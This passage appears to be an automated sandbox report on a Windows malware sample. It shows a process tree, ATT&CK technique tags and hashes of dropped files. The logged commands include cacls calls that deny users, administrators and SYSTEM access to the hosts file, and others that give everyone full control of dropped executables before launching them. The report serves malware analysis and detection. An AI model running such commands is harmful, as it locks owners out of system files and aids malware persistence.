C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:5244
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2724
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5976
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5592
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5852
-
-
-
C:\Windows\SysWOW64\wokakm.exeC:\Windows\SysWOW64\wokakm.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4600
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:3120
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1336
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:3080
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:4616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5008
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:2496
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:1048
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3388
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F1⤵PID:5000
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4476
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\rttutifin\fpibei.exe /p everyone:F2⤵PID:5436
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\vkdejee.exe1⤵PID:3108
-
C:\Windows\ime\vkdejee.exeC:\Windows\ime\vkdejee.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4160
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F1⤵PID:1544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3024
-
-
C:\Windows\system32\cacls.execacls C:\Windows\gibpmken\vkdejee.exe /p everyone:F2⤵PID:3388
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
810KB
MD5d8346d74c0ef121dae4e16dad8afdf18
SHA1e23f09d146f6a22487fbd99e66056cd66de11937
SHA256259130de617f1d516cd8a97ebc9e41b3d13e3c238a9982debe4cc0e9777f2fbf
SHA51246d09d982a88295e8ac0dc8b27b81adf9717af2239b60944025f17c30f46a85aaada18ed4d430ee690cd132871a590f1ff9836f9954a76d7c260d7ea45e78303
-
Filesize
8.6MB
MD5ddf43d965ae2202a4c5749363dd6601b
SHA19a38c6f71bb7687f6ad94d7a0251d257df35e6d0
SHA2562ad5482bea75256bf73d5691f6b06cd99453b0a074ca1a7a977fef2fb5f87382
SHA5129193ce240c4aba8b7a73c1f94054d38c167bc5d3d3945cf1d49676fe8d5b6cbfc9b00d68311536c7f212f34e0a601f3465bfc926d239a826706a300c940e5a8e
-
Filesize
26.0MB
MD506ba22965d60af4ab3879915dd3a523d
SHA1bd6a545b750006f589acdee0ef7606ffbe53acde
SHA25648bf09b12663eb8f594504529c97160bf6e786abcdae3907f089fe2895393c03
SHA512db8a955b623e424cefb6ea3de1a1aa12ac58c9626c5c7b03d6e100fa730a5c54ec9ea67331ba0d9fe1608feb1a74073a6d8cb8fa0a1746903f6da297b2e4d720
-
Filesize
4.1MB
MD54d532f753e46027bc081d318acda5d88
SHA1193406e496216c9379c23692cf2653331d1f7dfe
SHA2566a791ed83b72949b4e98f44ff469213891d0370535cbe24bb6c3b92e0adbdc99
SHA5125e6c21ba4b3d7f17ca21c3cd737705ed6f0eb1f7fe5e739ac604ca0bdb3bebdf0ed29fa9d7b6bcaa676840b767174f7bc90b1801e75aa3e741487db440f4be7b
-
Filesize
4.2MB
MD568a6735c6b29d927a8fd1f579d3b725b
SHA12651cba6be035624ae631c3c773ac3dacd8bb1a9
SHA2565615ffadcc5fd87e589d1375b316e183f804a6270b5441ae749756142e6f80ca
SHA5129a3ee539ad11f9a0bfd12fb3e6ac6f135dd294fd894aab577ed08d4b33c0ce63589a1217a18fcd69513f559515ee2ccda65aae694847b018b10f54543b587a7f
-
Filesize
2.9MB
MD5a7ff9a679785dd6063bf7e097da2b8a5
SHA1c11216495e44c0c130f1a4fa290db6dc806168ca
SHA256265871e0e2d6359a782d31226f5c70dfdd452955d7b66ec6d4f97b94eae1e655
SHA5123c3458e655a6f0c8f9895ce4caa29b95b307e3b4d1fa230bf5d9e1d9aa34e5881eab9d53ab564d7ac16970d5b169be953ea5cb1b5cc2b8947e6336453d80ca56
-
Filesize
7.8MB
MD54f4566e35d6e27f52050a05f149ac523
SHA1c3bbd86ebb1acf8ac0ccd35327ae57c8e3fb579b
SHA256450f93c0fb9d77f195755c0641738abff0584a8112e6dd27c237f13358340b94
SHA51279dce9931a6bc96b4e40ad4f730fee664433fcaf03d59fc4896c181d648e45dc3c710bd66f2291b808c4b449fba59836c104f935defbb4f3646a18069d02f1fa
-
Filesize
33.6MB
MD5a075445d0c8b456e3aec039f02a14cd2
SHA116da8141342b358ef885294eed4695dc77dedeb3
SHA2567ffea01deac6c9b5b0f5c7b15838ed0dc971a779ed13a136ad3d4f0495c1e034
SHA512fe44c723f131cea8658fb2cc565a8e884166ea3f77bd20cf55eb28c88d67631075389bc2e8642b9749a0b35bceafd07e4d1c1a153142c25f060cf57839e070d9
-
Filesize
2.8MB
MD5c28b3536cbc95abd7d829426d4e20c93
SHA1efd7a936c852c08fffe44c8d12659cc9d77748c3
SHA2562873d2a5e332d3e377ce7d16530c122001e3f186399daa896dad857e98fd15b8
SHA5120d25068639512d431156d1556d5a1fdd0252bc71fe60c21173c2f2640767d4262e0782b6a559a5dc74eb024368e1341a9fcb03705a2449a09fee153854e00d8e
-
Filesize
20.7MB
MD5d22bbffbd7539d3856783b1259c3daea
SHA108e013035a02d76972ebac1c270fd456f730a904
SHA2562b61d5c8aad02929d54359f71b887746ef6168bd7b1531cd4794daeb48e664f6
SHA5125e2f666d65264daa0b61d58ab8bf4c007e5668ee83fd524ed02363a1c54b8895af6259aa86907b5193473fc1299094c163c93840aa89fbc3e405c2bf2cc97dbe
-
Filesize
8.5MB
MD5e2f082be4b16203eb51d4d919f1c9254
SHA171af747413a91f0c7eb6a6df5c5b5c3f92349ae5
SHA2569e9b3534d9dd935927cd8ab24cd4c4003036bad14cd0661012f82e678731613c
SHA5127014ad32fd60fc56f45d6638eb08fd31fbd4016a2d7350e74bedf0e012d682718819f9f1ecbf9cf79882ac1e8b2bd37644dd13d23a220114af2afbceb25d9f27
-
Filesize
43.7MB
MD5f29f6409880b45355355d7c6f36a1c02
SHA116a612bc7587673abd56e49f17acf4d53a31da03
SHA256e8bba3e8d0a0ed27cc6ca32d992e2e7a1a8f3dde88d6a4e2d250de02fcb37a84
SHA5123928bad0668742af3e58fb76c4376e5621b448ec0899403f8efaf945ed16774d6cc658cdd766d3f2f82b77b4e2cd263021f0b8e40822cdeb84cbc5b9f29c3cec
-
Filesize
2.6MB
MD5236546b36d8b8b4be1a70bd6bc266641
SHA19b0328cf744ea05520f1b29222c7e82c2607a4c8
SHA256c5beecc152c3ce8eb66d5bfce07330ff28f50f1da6a35ab02fed208e2bfbb6d3
SHA512b758e8d6ecb9b3997b26f29a653d835d5f818a42e31cbbbaa5c60d283ceb32f5a8f8607756aed85f2fe6a865ce65c229c4c62f8b3d8f4b89502f88446b7f1347
-
Filesize
1.1MB
MD535eb1457a1619cf2b81124e9f8d535d1
SHA19d20d19a2d0c100062136db6928fefddd4d5416b
SHA256051348858e56364e148cd5a301cf0d13df8c3784be9886126820bcc09213bab7
SHA512cb1a872f6bf4951e87c1d9d7cf4728edf20b21f301f986c85508af29be3905d6ef1265a0a0b408bae5e1430a2566827e9919d8c062fdb51698f423860b807eae
-
Filesize
1019KB
MD5816cda9ebe821b13bad34bc08dcf24f7
SHA136cb3541c13aaf8c3a3db0e6e5f26df23230088b
SHA256539d63f5c42ed94b6c7c9aca164e8792c30a772d3c7e61e7bb1b550458eb9918
SHA512f7fe267133ad85a8e7b4688004987e870a244234968c3205d336cb729b4367e083b8bad5c09a9fb2189cc78d08a470f3eed46d2b1906ddd824ee1e68917b0d03
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
7.8MB
MD57fe6bc8fe025c25274c6a4cb5bbf1515
SHA1198cc6c487f060659de3550c9a978c4045fb2ed8
SHA256f5ff7746b8931c47ca9106892713955f3d02eb246b96e786b26d0955b1e94bd7
SHA512a161f88ad738885df439550409bbf1fbab30d241af957760466a610961039e60cd1e0a8f01c93cf76590cf2de01a7e7cbed40fb3a7492fab8be78fa2b957bf9c
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe